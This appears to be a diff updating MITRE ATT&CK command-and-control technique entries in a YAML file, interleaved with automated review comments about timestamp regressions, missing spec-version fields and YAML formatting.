+ url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1573.001:
technique:
modified: '2023-12-26T20:58:19.356Z'
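Review bot: the quoted `description` for the new T1071.005 entry is split across lines that lack the `+` prefix (`, XMPP`, `,`, `, and STOMP`, `use a publish/subscribe design,`), so as shown the hunk is not a valid unified diff and the double-quoted YAML value is broken mid-string; regenerate the entry and verify that the resulting `description` is one well-formed string reading `Protocols such as MQTT, XMPP, AMQP, and STOMP use a publish/subscribe design, ...`. Also note that `x_mitre_detection: ''` is empty for this sub-technique even though two `Network Traffic` data sources are listed; if that is what upstream ships it is fine, but it is worth a comment so it is not mistaken for a generation error.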
@@ -36836,7 +37317,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1568.001:
technique:
@@ -36868,7 +37348,7 @@ command-and-control:
url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
are they and how do they work?. Retrieved March 11, 2020.'
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T16:10:37.183Z'
name: Fast Flux DNS
description: |-
Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
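Review bot: the `modified` timestamp for T1568.001 moves backwards, from `2021-04-29T14:49:39.188Z` to `2020-03-27T16:10:37.183Z`; the same regression appears in the hunks below for T1205, T1572, T1090, T1568, T1568.003, T1104, T1205.001 and T1102.003, while T1071 and T1102 move forward. That pattern suggests these objects were pulled from a different (older or differently normalised) STIX source than the rest; confirm the source bundle before merging so a later regeneration does not flip them back.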
@@ -36890,22 +37370,20 @@ command-and-control:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071:
technique:
- modified: '2024-01-17T22:52:23.454Z'
+ modified: '2024-08-28T14:10:33.145Z'
name: Application Layer Protocol
description: "Adversaries may communicate using OSI application layer protocols
to avoid detection/network filtering by blending in with existing traffic.
Commands to the remote system, and often the results of those commands, will
be embedded within the protocol traffic between the client and server. \n\nAdversaries
may utilize many different protocols, including those used for web browsing,
- transferring files, electronic mail, or DNS. For connections that occur internally
- within an enclave (such as those between a proxy or pivot node and other nodes),
- commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
- Spy Email Nov 22) "
+ transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+ that occur internally within an enclave (such as those between a proxy or
+ pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+ Mandiant APT29 Eye Spy Email Nov 22) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
@@ -36927,7 +37405,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -36952,7 +37430,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071
atomic_tests: []
T1219:
@@ -37036,7 +37513,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1219
atomic_tests: []
T1659:
@@ -37100,11 +37576,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -37188,7 +37663,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1572:
technique:
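Review bot: this entry keeps `x_mitre_attack_spec_version: 2.1.0` in the context line while `spec_version: '2.1'` is removed, whereas the other entries touched by this patch carry `x_mitre_attack_spec_version: 3.2.0`; check whether the upstream object for this technique was genuinely left at 2.1.0 or whether it was missed by the regeneration.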
@@ -37219,7 +37693,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T17:15:35.372Z'
name: Protocol Tunneling
description: "Adversaries may tunnel network communications to and from a victim
system within a separate protocol to avoid detection/network filtering and/or
@@ -37239,8 +37713,8 @@ command-and-control:
encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
- [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
- further conceal C2 communications and infrastructure. "
+ [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+ to further conceal C2 communications and infrastructure. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
@@ -37262,8 +37736,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1572
atomic_tests: []
T1071.003:
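Review bot: the hunk removes `x_mitre_attack_spec_version: 2.1.0` from T1572 with no replacement visible, unlike T1102 further down where a `3.2.0` line is added back; since this hunk is only the tail of the object, confirm the key is re-emitted earlier in the T1572 entry rather than dropped. The same check applies to the parallel hunks for T1090, T1568, T1568.003, T1104, T1205.001 and T1102.003.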
@@ -37325,7 +37797,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1092:
technique:
@@ -37373,7 +37844,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090.002:
technique:
@@ -37427,7 +37897,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090:
technique:
@@ -37460,7 +37929,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T19:16:11.648Z'
name: Proxy
description: |-
Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -37480,8 +37949,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1568:
technique:
@@ -37519,7 +37986,7 @@ command-and-control:
url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:26:23.782Z'
name: Dynamic Resolution
description: |-
Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -37547,42 +38014,22 @@ command-and-control:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1102:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Anastasios Pingios
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
- type: attack-pattern
- created: '2017-05-31T21:31:13.915Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1102
- url: https://attack.mitre.org/techniques/T1102
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-07T17:53:54.380Z'
name: Web Service
description: |-
- Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+ Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - Anastasios Pingios
+ - Sarathkumar Rajendran, Microsoft Defender365
+ x_mitre_deprecated: false
x_mitre_detection: 'Host data that can relate unknown or suspicious process
activity using a network connection is important to supplement any existing
indicators of compromise based on malware command and control signatures and
@@ -37591,17 +38038,39 @@ command-and-control:
for uncommon data flows (e.g., a client sending significantly more data than
it receives from a server). User behavior monitoring may help to detect abnormal
patterns of activity.(Citation: University of Birmingham C2)'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+ created: '2017-05-31T21:31:13.915Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1102
+ external_id: T1102
+ - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+ description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+ Graph API for C&C communication. Retrieved July 1, 2024.
+ url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1568.003:
technique:
@@ -37633,7 +38102,7 @@ command-and-control:
description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
Operations. Retrieved March 6, 2017.
url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T20:54:28.287Z'
name: DNS Calculation
description: |-
Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -37650,8 +38119,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1104:
technique:
@@ -37671,7 +38138,7 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1104
external_id: T1104
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:43:38.181Z'
name: Multi-Stage Channels
description: |-
Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -37694,8 +38161,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1205.001:
technique:
@@ -37720,7 +38185,7 @@ command-and-control:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -37745,8 +38210,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.002:
technique:
@@ -37811,7 +38274,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1102.003:
technique:
@@ -37835,7 +38297,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:26:10.109Z'
name: One-Way Communication
description: |-
Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -37860,21 +38322,36 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.003:
technique:
- modified: '2024-04-19T13:24:36.872Z'
+ modified: '2024-09-25T20:48:24.411Z'
name: 'Proxy: Multi-hop Proxy'
- description: |-
- Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
- For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
- In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
-
- Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+ description: "Adversaries may chain together multiple proxies to disguise the
+ source of malicious traffic. Typically, a defender will be able to identify
+ the last proxy traffic traversed before it enters their network; the defender
+ may or may not be able to identify any previous proxies before the last-hop
+ proxy. This technique makes identifying the original source of the malicious
+ traffic even more difficult by requiring the defender to trace malicious traffic
+ through several proxies to identify its source.\n\nFor example, adversaries
+ may construct or use onion routing networks – such as the publicly available
+ [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+ C2 traffic through a compromised population, allowing communication with any
+ device within the network.(Citation: Onion Routing) Adversaries may also use
+ operational relay box (ORB) networks composed of virtual private servers (VPS),
+ Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+ obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+ infrastructure, it is possible for an adversary to leverage multiple compromised
+ devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+ By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+ on routers, adversaries can add custom code to the affected network devices
+ that will implement onion routing between those nodes. This method is dependent
+ upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+ method allowing the adversaries to cross the protected network boundary of
+ the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+ \ Protocols such as ICMP may be used as a transport. \n\nSimilarly, adversaries
+ may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+ routing between a decentralized network of peers.(Citation: NGLite Trojan)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
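Review bot: the T1090.003 description switches from a literal block scalar to a double-quoted scalar, and the new string carries whitespace that changes the rendered text: a trailing space before "\n\n" after "(Citation: ORB Mandiant)", and the "\ Protocols such as ICMP" escape that puts a leading space on that sentence plus a trailing space before the "\n\n" that follows it. Keep the literal block form, or strip the stray spaces, so the description is identical to the previous text apart from the added ORB sentence. This hunk also deletes both spec_version and x_mitre_attack_spec_version: 2.1.0 from the preceding technique, leaving it with no spec version field at all; see the note on T1102.002 below.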
@@ -37893,7 +38370,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.1'
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -37907,6 +38384,11 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1090/003
external_id: T1090.003
+ - source_name: ORB Mandiant
+ description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+ Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+ July 8, 2024.
+ url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
- source_name: NGLite Trojan
description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
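Review bot: the new ORB Mandiant entry gives the author as "Raggi, Michael." while the neighbouring references use surname plus initial ("Zhang, X.", "Hromcova, Z."); use "Raggi, M." for consistency. The source_name matches the "(Citation: ORB Mandiant)" token inserted into the description, so the citation resolves.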
@@ -37920,12 +38402,11 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.003
atomic_tests: []
T1001:
technique:
- modified: '2024-02-02T19:04:35.389Z'
+ modified: '2024-10-07T15:07:47.232Z'
name: Data Obfuscation
description: 'Adversaries may obfuscate command and control traffic to make
it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -37975,11 +38456,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1571:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:37:57.868Z'
name: Non-Standard Port
description: |-
Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -37988,20 +38468,20 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze packet contents to detect communications that do
not follow the expected protocol behavior for the port that is being used.
Analyze network data for uncommon data flows (e.g., a client sending significantly
more data than it receives from a server). Processes utilizing the network
that do not normally have network communication or have never been seen before
are suspicious.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
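Review bot: this hunk is a pure key reorder for T1571 (x_mitre_deprecated, x_mitre_domains and x_mitre_is_subtechnique move above x_mitre_platforms) with no value changes, so it adds review noise without changing the loaded object. If the generator now emits keys in a fixed order that is fine, but say so in the commit message so reviewers know these hunks can be skipped.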
@@ -38026,17 +38506,16 @@ command-and-control:
url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
- source_name: Fortinet Agent Tesla April 2018
description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
Variant. Retrieved November 5, 2018.
url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1571
atomic_tests: []
T1573:
@@ -38092,7 +38571,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1573
atomic_tests: []
T1102.002:
@@ -38117,7 +38595,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:15:47.861Z'
name: Bidirectional Communication
description: "Adversaries may use an existing, legitimate external Web service
as a means for sending commands to and receiving output from a compromised
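Review bot: the modified timestamp for T1102.002 moves backwards, from 2021-04-29T14:49:39.188Z to 2020-03-26T23:15:47.861Z, with no change to the technique body in this hunk. The same regression appears below for T1132.002, T1001.002, T1008, T1102.001, T1602 and T1560.003. Confirm this matches the upstream STIX bundle rather than an older cached copy; anything that uses modified for change detection will treat these objects as older than what it already holds.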
@@ -38154,8 +38632,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1573.002:
technique:
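Review bot: removing spec_version together with x_mitre_attack_spec_version: 2.1.0 leaves T1102.002 with no ATT&CK spec version field at all, whereas the 3.1.0 and 3.2.0 objects in this patch only lose spec_version and keep x_mitre_attack_spec_version. Either keep the 2.1.0 value or bump it to 3.2.0 with the matching fields (revoked, x_mitre_deprecated, x_mitre_domains) as the T1025 hunk does; a consumer that reads x_mitre_attack_spec_version to choose a parser will otherwise hit a missing key.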
@@ -38209,7 +38685,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1095:
technique:
@@ -38281,33 +38756,12 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1095
atomic_tests: []
T1001.003:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
- type: attack-pattern
- created: '2020-03-15T00:40:27.503Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1001.003
- url: https://attack.mitre.org/techniques/T1001/003
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
- name: Protocol Impersonation
+ modified: '2024-10-09T15:40:19.436Z'
+ name: Protocol or Service Impersonation
description: "Adversaries may impersonate legitimate protocols or web service
traffic to disguise command and control activity and thwart analysis efforts.
By impersonating legitimate protocols or web services, adversaries can make
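Review bot: T1001.003 is renamed from "Protocol Impersonation" to "Protocol or Service Impersonation" while external_id stays T1001.003, so any index or lookup keyed on the technique name must be regenerated in the same commit. The rename is easy to miss because the whole object is rewritten in a different key order; a separate hunk for the name and version change would make it reviewable. The x_mitre_version bump to 2.0 in the next hunk is appropriate for a renamed technique.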
@@ -38315,23 +38769,61 @@ command-and-control:
\ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
like subsequent traffic is SSL/TLS encrypted, potentially interfering with
some security tooling, or to make the traffic look like it is related with
- a trusted entity. "
+ a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+ impersonate expected web traffic or trusted services. For example, adversaries
+ may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+ data to disguise C2 communications or mimic legitimate services such as Gmail,
+ Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
